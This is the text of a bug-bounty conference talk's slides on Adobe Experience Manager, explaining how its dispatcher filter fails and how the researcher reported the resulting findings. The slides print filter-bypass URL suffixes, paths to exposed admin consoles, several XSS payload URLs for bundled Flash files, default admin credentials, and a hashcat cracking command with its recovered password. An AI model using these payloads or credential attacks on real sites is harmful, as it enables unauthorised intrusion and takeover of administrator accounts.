Slide 1

Slide 1 text

@fransrosen A story of the passive aggressive sysadmin of AEM or "How to make a talk in 3h 35min"

Slide 2

Slide 2 text

@fransrosen Frans Rosén Bug bounties! labs.detectify.com twitter.com/fransrosen I blogged about Subdomain Takeovers. Donald Trump got hacked. The hacker referred to my post as his inspiration. I broke Let’s Encrypt Live hacking! I won a boxing belt once

Slide 3

Slide 3 text

@fransrosen Frans Rosén Bug bounties! labs.detectify.com twitter.com/fransrosen I blogged about Subdomain Takeovers. Donald Trump got hacked. The hacker referred to my post as his inspiration. I broke Let’s Encrypt Live hacking! I won a boxing belt once namedropped in ytcracker - green hat

Slide 4

Slide 4 text

@fransrosen 2016 – Peter Adkins https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

Slide 5

Slide 5 text

@fransrosen 2016 – Peter Adkins https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html CVE-2016-0957

Slide 6

Slide 6 text

@fransrosen 2016 – Peter Adkins https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html CVE-2016-0957 "The world’s lamest RCE."

Slide 7

Slide 7 text

@fransrosen How AEM is structured https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

Slide 8

Slide 8 text

@fransrosen How AEM is structured Adobe "black magic glue"

Slide 9

Slide 9 text

@fransrosen How AEM is structured Stuff you pay your consultants for Adobe "black magic glue"

Slide 10

Slide 10 text

@fransrosen Shit no one’s updating Stuff you pay your consultants for Adobe "black magic glue" How AEM is structured

Slide 11

Slide 11 text

@fransrosen How AEM is structured https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

Slide 12

Slide 12 text

@fransrosen How AEM is structured Apache HTTP server module

Slide 13

Slide 13 text

@fransrosen How AEM is structured Reverse proxy+filter Apache HTTP server module

Slide 14

Slide 14 text

@fransrosen How AEM is structured Apache HTTP server module Pages + metadata + content Reverse proxy+filter

Slide 15

Slide 15 text

@fransrosen How AEM is structured Apache HTTP server module Pages + metadata + content Reverse proxy+filter A bunch of admin-tools

Slide 16

Slide 16 text

@fransrosen How AEM is structured You should not have access to this Apache HTTP server module Pages + metadata + content Reverse proxy+filter A bunch of admin-tools

Slide 17

Slide 17 text

@fransrosen How AEM is structured You should not have access to this Or this Apache HTTP server module Reverse proxy+filter A bunch of admin-tools Pages + metadata + content

Slide 18

Slide 18 text

@fransrosen Creating pages

Slide 19

Slide 19 text

@fransrosen Creating pages Author creates a new page in the repo

Slide 20

Slide 20 text

@fransrosen Creating pages Author creates a new page in the repo Goes through the publisher nodes

Slide 21

Slide 21 text

@fransrosen Creating pages Author creates a new page in the repo Goes through the publisher nodes Dispatcher serves the content

Slide 22

Slide 22 text

@fransrosen Accessing pages

Slide 23

Slide 23 text

@fransrosen Accessing pages Dispatcher gets the URL

Slide 24

Slide 24 text

@fransrosen Accessing pages Dispatcher gets the URL Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)

Slide 25

Slide 25 text

@fransrosen Accessing pages Dispatcher gets the URL If all is OK, serve from publish node Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)

Slide 26

Slide 26 text

@fransrosen CVE-2016-0957 aka "I am two years old but I’m inside an enterprise product that no one can or dares to upgrade"

Slide 27

Slide 27 text

@fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)

Slide 28

Slide 28 text

@fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)

Slide 29

Slide 29 text

@fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)

Slide 30

Slide 30 text

@fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)

Slide 31

Slide 31 text

@fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)

Slide 32

Slide 32 text

@fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)

Slide 33

Slide 33 text

@fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)

Slide 34

Slide 34 text

@fransrosen This is ridiculous

Slide 35

Slide 35 text

@fransrosen Accessing pages?.css Dispatcher gets the URL?.css

Slide 36

Slide 36 text

@fransrosen Accessing pages Dispatcher gets the URL?.css Every time is OK time

Slide 37

Slide 37 text

@fransrosen Accessing pages Dispatcher gets the URL?.css Every time is OK time Serve from publish node

Slide 38

Slide 38 text

@fransrosen Publish nodes

Slide 39

Slide 39 text

@fransrosen Disk usage /etc/reports/diskusage.html?.css Disk Usage lists all repo dirs + metadata

Slide 40

Slide 40 text

@fransrosen My fav, opensocial proxy /libs/opensocial/proxy?url=x&.css

Slide 41

Slide 41 text

@fransrosen My fav, opensocial proxy /libs/opensocial/proxy?url=x&.css

Slide 42

Slide 42 text

@fransrosen …but there’s more!

Slide 43

Slide 43 text

@fransrosen CRX Explorer /crx/de/index.jsp?.css

Slide 44

Slide 44 text

@fransrosen CRX Explorer /crx/explorer/browser/index.jsp?.css

Slide 45

Slide 45 text

@fransrosen CRX Explorer Search /crx/explorer/browser/index.jsp?.css

Slide 46

Slide 46 text

@fransrosen Content Repository Extreme /crx/explorer/index.jsp?.css

Slide 47

Slide 47 text

@fransrosen Package Manager /crx/packmgr/index.jsp?.css

Slide 48

Slide 48 text

@fransrosen Namespace Editor (no auth needed!) /crx/explorer/ui/namespace_editor.jsp?.css

Slide 49

Slide 49 text

@fransrosen bin/querybuilder /bin/querybuilder.json?.css

Slide 50

Slide 50 text

@fransrosen bin/querybuilder /bin/querybuilder.json?.css

Slide 51

Slide 51 text

@fransrosen

Slide 52

Slide 52 text

@fransrosen bin/querybuilder for SWFs!

Slide 53

Slide 53 text

@fransrosen bin/querybuilder for SWFs!

Slide 54

Slide 54 text

@fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

Slide 55

Slide 55 text

@fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

Slide 56

Slide 56 text

@fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain) /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String

Slide 57

Slide 57 text

@fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain) /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// Thx Neal Poole

Slide 58

Slide 58 text

@fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain) /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// Thx Neal Poole

Slide 59

Slide 59 text

@fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain) /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window Thx Neal Poole

Slide 60

Slide 60 text

@fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain) /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window /etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf? loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain) %7dcatch(e)%7b%7d// Thx Neal Poole

Slide 61

Slide 61 text

@fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain) /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window /etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf? loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain) %7dcatch(e)%7b%7d// /etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source] (document.domain)-window Thx Neal Poole

Slide 62

Slide 62 text

@fransrosen Allowing anonymous publish access

Slide 63

Slide 63 text

@fransrosen Allowing anonymous publish access

Slide 64

Slide 64 text

@fransrosen Allowing anonymous publish access

Slide 65

Slide 65 text

@fransrosen but Peter mentioned RCE?

Slide 66

Slide 66 text

@fransrosen RCE? https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

Slide 67

Slide 67 text

@fransrosen RCE? https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html admin / admin

Slide 68

Slide 68 text

@fransrosen RCE https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

Slide 69

Slide 69 text

@fransrosen RCE https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

Slide 70

Slide 70 text

@fransrosen Patch for CVE-2016-0957

Slide 71

Slide 71 text

@fransrosen Patch for CVE-2016-0957 WOHO! WOHO!

Slide 72

Slide 72 text

@fransrosen Patch for CVE-2016-0957 WOHO! WOHO!

Slide 73

Slide 73 text

@fransrosen Patch for CVE-2016-0957 THEN WHAT IS THE PROBLEM? WOHO! WOHO!

Slide 74

Slide 74 text

@fransrosen Problem 1

Slide 75

Slide 75 text

@fransrosen Problem 1

Slide 76

Slide 76 text

@fransrosen Problem 1 PRIORITY: nah, bro

Slide 77

Slide 77 text

@fransrosen Problem 2

Slide 78

Slide 78 text

@fransrosen Problem 2

Slide 79

Slide 79 text

@fransrosen Patch for CVE-2016-0957 IRL VERSION

Slide 80

Slide 80 text

@fransrosen Patch for CVE-2016-0957 IRL

Slide 81

Slide 81 text

@fransrosen Patch for CVE-2016-0957 IRL

Slide 82

Slide 82 text

@fransrosen Patch for CVE-2016-0957 IRL

Slide 83

Slide 83 text

@fransrosen Bypasses, seriously ?.js ;%0a.css Thank Jasmin Landry for this one

Slide 84

Slide 84 text

@fransrosen The passive agressive sysadmin

Slide 85

Slide 85 text

@fransrosen The passive agressive sysadmin + +

Slide 86

Slide 86 text

@fransrosen The passive agressive sysadmin + +

Slide 87

Slide 87 text

@fransrosen I’ve seen this before

Slide 88

Slide 88 text

@fransrosen AEM

Slide 89

Slide 89 text

@fransrosen CRX

Slide 90

Slide 90 text

@fransrosen CRXDE

Slide 91

Slide 91 text

@fransrosen All other stuff

Slide 92

Slide 92 text

@fransrosen /system/console

Slide 93

Slide 93 text

@fransrosen /system/console admin / admin

Slide 94

Slide 94 text

@fransrosen /system/console admin / admin

Slide 95

Slide 95 text

@fransrosen Report!

Slide 96

Slide 96 text

@fransrosen Search time!

Slide 97

Slide 97 text

@fransrosen Search time!

Slide 98

Slide 98 text

@fransrosen Search time!

Slide 99

Slide 99 text

@fransrosen Search time!

Slide 100

Slide 100 text

@fransrosen WTF

Slide 101

Slide 101 text

@fransrosen WTF $ h=$(echo "6J7An/QgzU+j5gr1G0CyEexJ9xkgiIyyUzTcmaCCV5g=" \ | base64 -D | xxd -p | tr -d '\n')

Slide 102

Slide 102 text

@fransrosen WTF $ h=$(echo "6J7An/QgzU+j5gr1G0CyEexJ9xkgiIyyUzTcmaCCV5g=" \ | base64 -D | xxd -p | tr -d '\n') $ echo $h e89ec09ff420cd4fa3e60af51b40b211ec49f71920888cb25334dc99a082 5798

Slide 103

Slide 103 text

@fransrosen hashcat ftw $ echo $h > hash.txt $ ./hashcat.app -a 0 -m 1400 hash.txt rockyou.txt

Slide 104

Slide 104 text

@fransrosen hashcat ftw $ echo $h > hash.txt $ ./hashcat.app -a 0 -m 1400 hash.txt rockyou.txt 
 Status.........: Cracked Started: Thu Sep 13 11:59:23 2018 Stopped: Thu Sep 13 11:59:25 2018

Slide 105

Slide 105 text

@fransrosen hashcat ftw ih8uall

Slide 106

Slide 106 text

@fransrosen /system/console

Slide 107

Slide 107 text

@fransrosen /system/console admin / ih8uall

Slide 108

Slide 108 text

@fransrosen /system/console

Slide 109

Slide 109 text

@fransrosen /system/console

Slide 110

Slide 110 text

@fransrosen Report 2

Slide 111

Slide 111 text

@fransrosen Report 2

Slide 112

Slide 112 text

@fransrosen Report 2

Slide 113

Slide 113 text

@fransrosen Public bug bounty programs with AEM Public responsible disclosure Private ones

Slide 114

Slide 114 text

@fransrosen Thanks!